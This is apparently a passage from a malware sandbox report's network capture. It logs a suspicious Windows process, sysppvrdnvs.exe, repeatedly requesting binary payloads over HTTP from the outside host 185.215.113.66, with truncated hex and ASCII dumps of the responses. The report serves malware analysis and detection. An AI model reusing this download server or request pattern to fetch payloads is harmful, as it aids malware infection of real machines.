                                                                                                                                                                                                    Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                                    Oct 26, 2024 07:26:55.044781923 CEST112INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                                    Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x
                                                                                                                                                                                                    Oct 26, 2024 07:26:55.044831991 CEST1236INData Raw: e7 fb dd bb ba 5c 82 d9 10 01 16 0b d1 18 bc a5 c1 52 27 e6 01 29 e5 a1 94 eb 5a d4 9c d9 0e c6 b9 08 0f 7b d1 dc 97 ca 03 fd 8d 9b 69 02 43 7f bb 2c 1c 7d 27 9e f3 1f 9e 05 68 84 fa 43 bc b1 ac 68 af c3 ad 35 ee 5b d6 9c 1a 77 52 47 90 d7 8d 40
                                                                                                                                                                                                    Data Ascii: \R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He&qs*ukH7<IzH6=Azqk]9hlg:k.vK4"N[e:M;2/KUNMlRA8Wh!&J|-^=_4g


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    5192.168.2.858709185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.057725906 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990036011 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:56 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 16128
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a973-3f00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990066051 CEST1236INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                                    Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990082026 CEST1236INData Raw: 79 66 85 08 93 95 1d 74 ce 4a 11 6d 82 e1 0a e2 81 2a fe 53 85 e7 03 3d 26 89 2a ac bc 6b 82 a8 ad b3 ff 6f 2b 13 be 1a 78 df 38 94 08 4e 19 a1 85 a6 e7 97 55 2a 34 6a c4 05 a0 b4 7d d6 cf ac 4f ad fd 67 d8 7a 3f 8d 05 43 ee 09 c1 87 a8 e4 28 65
                                                                                                                                                                                                    Data Ascii: yftJm*S=&*ko+x8NU*4j}Ogz?C(ekds&;`!R[8ipurbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990098000 CEST336INData Raw: 13 cc c0 02 63 9a f7 32 ef 05 a2 d8 0c a2 f0 13 e8 02 8c 5a 9f a4 b1 f5 8e 8e f2 44 26 09 e9 eb 90 01 b6 1f 6f ef 7a 7b 6f 72 b5 32 43 3f 03 45 5d 21 47 fb e4 6d 8f 19 57 dc 36 a6 1f d0 65 d6 13 fb 52 58 f0 b0 74 c9 f1 06 93 12 b1 0d 2c 66 18 38
                                                                                                                                                                                                    Data Ascii: c2ZD&oz{or2C?E]!GmW6eRXt,f8}(nr(D3:cGl6fq{>QAB1T[~3#VPv|lF;yHu^-z|&#BzHrsexJJe"x
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990123034 CEST1236INData Raw: b9 1a 39 14 ab a4 68 77 17 61 1d 4c 7b 8d 25 bc 2b e9 a0 8a d9 5f fa a6 41 31 43 1c 76 91 d9 73 44 4a 06 90 dc 72 66 88 82 d3 13 86 86 d2 3f b9 a4 5a 2d e3 0f 5c cf b3 5d a0 3f 69 b1 66 b5 3b 1a 26 28 41 1f 48 0b ab 67 eb e3 e6 06 15 2b 5e 8e eb
                                                                                                                                                                                                    Data Ascii: 9hwaL{%+_A1CvsDJrf?Z-\]?if;&(AHg+^M$^GGWRmMZuir&Zrqa!s2c{Ms|T[cS^fNy#`=-\8H6:bzm)A]YARZRH?]4S?6o
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990139008 CEST1236INData Raw: 05 43 70 94 6f 23 94 3d 53 1f 2d 02 a6 b7 91 73 f0 f8 81 5f 62 3d ba 9e 5a 40 c4 62 28 e4 41 3e 4f 3e c0 e3 d4 32 9b 91 1c 23 69 8e 25 cf 77 e3 74 b0 3c 32 dd 91 85 14 67 51 45 b4 f8 3e 26 b8 48 82 b7 96 4d 2c 54 8b 3e 45 bb 83 af 30 b8 a2 f0 13
                                                                                                                                                                                                    Data Ascii: Cpo#=S-s_b=Z@b(A>O>2#i%wt<2gQE>&HM,T>E0`D/ZSd|g=K/rz&/D)4vs3LQq>&$PR&0*>%h~?jw*)pg8J Zhpl^yh(qKoIPN
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990154028 CEST1236INData Raw: f5 0b 23 41 fa 16 64 5e bc 86 37 70 a1 37 3a e3 45 6c 63 9f f2 39 42 04 e3 c9 09 9f 63 92 60 86 fd 02 4c b0 dc e6 00 61 f4 65 7f 60 e4 25 13 9b 97 69 0d 4f ca 8c 47 56 59 3e 1e a5 07 b3 67 2d bd 1e 90 73 31 07 1b 2f 3e a4 76 21 05 d3 8c 91 90 68
                                                                                                                                                                                                    Data Ascii: #Ad^7p7:Elc9Bc`Lae`%iOGVY>g-s1/>v!hA_5cdKp> H,25kCl#p3@^Jb.?j4V-'/hY^k}B[X%JNS{\vPe<[W7b${SXTb]_'g'P
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990171909 CEST336INData Raw: a0 5f bc ba 0a 67 62 39 4c f0 98 ed cc e4 4b f4 92 62 b4 0c 53 9b 0c e8 1e b6 5f 78 ef e5 ce 07 5f 39 be bf 73 55 17 40 d6 61 5d 88 17 ea 26 f4 c5 59 d5 7d 7b f6 c1 8c f0 bb a3 1a 32 8e ac 55 3d 14 83 29 49 18 75 85 c5 47 f5 87 bc be ee cf 21 8e
                                                                                                                                                                                                    Data Ascii: _gb9LKbS_x_9sU@a]&Y}{2U=)IuG!$<hBu;/V|XA[K+OQMVc84S5Una]P:f|yZ"1])00e`Zx[w!1Om)$BEAi%2<Y8\{
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990537882 CEST1236INData Raw: 61 a2 39 0e a5 75 4e 7f 43 be 9a 7a 42 19 5c 44 23 8e a7 f1 c7 b4 ef f4 34 f5 ea c0 c6 9d 42 a1 be 25 35 5d 91 b7 2f fb 57 de c0 c2 43 8e 9d ba c5 c2 de 56 be bf 89 06 97 08 15 4e 05 2a 0e a5 7f 1b 0d d3 98 e8 7e 43 0f 5c 8f e8 46 f7 3d 50 9e 30
                                                                                                                                                                                                    Data Ascii: a9uNCzB\D#4B%5]/WCVN*~C\F=P0^(IZ=\9cD&eY>3_q;DlS(m=WUg[Sj%Ko7v!M\oD]*c'q7tQnE=jv^YqjkTqHj<TM]VF~8nhCJ
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.990612030 CEST1236INData Raw: 09 0d 48 a1 f8 16 b9 9b 26 06 0c 71 c1 02 4a 14 24 ab e2 0d e0 93 9d 59 04 93 11 63 22 2f 70 d1 c9 0c b1 7e 61 54 9f c5 a6 6c a0 92 75 29 01 02 e5 7f 98 4b d7 94 db 6a 1f c3 be 93 e3 ff c0 cb 7a 36 a6 06 4a e1 9f 79 7a 5d da 78 b2 95 fb 3d 9e a5
                                                                                                                                                                                                    Data Ascii: H&qJ$Yc"/p~aTlu)Kjz6Jyz]x=$s^!}_m+ck@L.<4^f wtEpr)o}nEL-MC*kK<[fw^jBYio1JvHwaJ+G-
                                                                                                                                                                                                    Oct 26, 2024 07:26:56.995759964 CEST1236INData Raw: 55 52 74 b5 1b 28 36 ee f8 74 c2 d2 9d 56 5e dc 6a ec 28 2a a9 e5 8a f1 39 85 01 d8 09 10 40 9e e8 9a ab cc 39 7e 76 23 69 2f 4f df bc 42 04 2b b2 88 62 72 b7 bb be 62 94 10 72 be 8d 4f 34 e0 fb 8a 4e ff 1e 04 7a 1c 49 42 4a b1 a9 b1 f9 71 23 f2
                                                                                                                                                                                                    Data Ascii: URt(6tV^j(*9@9~v#i/OB+brbrO4NzIBJq#LE2&xPV7vg?6K0v'p}%6GD+D%HTD$PioV><x6>S@Kv*Jj`-y-'#[jMF,aYk@hh
                                                                                                                                                                                                    Oct 26, 2024 07:27:03.536854029 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:03.825562954 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:03 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 10496
                                                                                                                                                                                                    Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67154d18-2900"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    6192.168.2.854297185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:04.871608019 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767210007 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:05 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 10496
                                                                                                                                                                                                    Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67154d18-2900"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767354012 CEST112INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                    Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767365932 CEST1236INData Raw: eb f7 e1 3e b0 c8 e9 ca 8d d4 e4 c0 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b
                                                                                                                                                                                                    Data Ascii: >*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767376900 CEST1236INData Raw: be 2f 61 3a 1b 4e 54 9f 16 74 9c d6 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc
                                                                                                                                                                                                    Data Ascii: /a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767404079 CEST1236INData Raw: 99 31 96 51 d2 49 8d 75 9f a1 b5 63 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c
                                                                                                                                                                                                    Data Ascii: 1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh[
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767415047 CEST1236INData Raw: 93 05 8f 66 d7 1c 1e 74 35 55 8e 3e 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99
                                                                                                                                                                                                    Data Ascii: ft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767426014 CEST548INData Raw: 97 a0 8b 45 e0 ec f0 2c 50 58 8e 3c ef bb 8f 8f 8e 79 75 0a ad 02 36 43 01 14 de 49 45 eb 9b 46 60 fc 21 cd 8c ae 55 be 65 24 01 75 0e cf ef 97 39 fb a0 af 9d 72 ee ee e6 3b 53 91 15 f0 77 de 88 6a f6 e4 10 46 f4 22 86 d5 e8 fe 64 bd bf 16 44 78
                                                                                                                                                                                                    Data Ascii: E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bScV<N^SM%Dz*a0)tao(Jag{;5? w7m1j"zAJV,
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767436981 CEST1236INData Raw: 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6 f3 62 9e e0 19 5c 0f 68 6c 6a 7f 47 c7 6b 63 e5 d3 9b eb 79 15 a0 d6 c4 60 4c f7 0f 40 be 83 26 df ce 43 87 cd 37 57 7b
                                                                                                                                                                                                    Data Ascii: r8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r2.Q'mUJ1lt{-aY49<
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767456055 CEST1236INData Raw: f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10 d5 65 63 95 11 9a 93 94 ab 63 b4 0e 5a fd eb e5 bf ce 3f c0 6d 0d 5f 0a 8d f8 3d 55 86 56 9f f1 e1 fa 87 54 fb 9d 0b d8
                                                                                                                                                                                                    Data Ascii: oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg'|]w<
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.767467976 CEST1236INData Raw: 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb 81 a5 d4 c1 12 4a c4 cd 73 86 e5 c6 e1 c7 02 a4 a6 0a 98 3d 76 8f bb 48 84 02 a5 42 6a 1c 63 d4 30 c9 9c 9a 6e 9b 57 4e
                                                                                                                                                                                                    Data Ascii: yC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)pLl!LugJ:hL"@hNUoZwA
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.772821903 CEST213INData Raw: 1e 57 59 ed d7 da ea d6 d9 46 e4 8c 80 e2 75 79 c7 33 ef c9 63 ea f7 ad 73 7b 94 8f 90 5e bf 0a bb 5e 60 c4 7d 18 81 04 3c 05 d2 c6 a6 38 b3 05 4c 5b 2d 6f 67 ce c1 e1 b6 d2 01 c6 0f b0 2e 1b cf 7e ce 0f 55 f5 f3 f2 fb a4 d6 3f c2 56 eb ba 69 bf
                                                                                                                                                                                                    Data Ascii: WYFuy3cs{^^`}<8L[-og.~U?Via;ZhytzRR~K0j3aL!b%I"%x4NUIUzg$V#Twn*'8ixwU
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.896634102 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.172213078 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:12 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 13568
                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67179628-3500"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
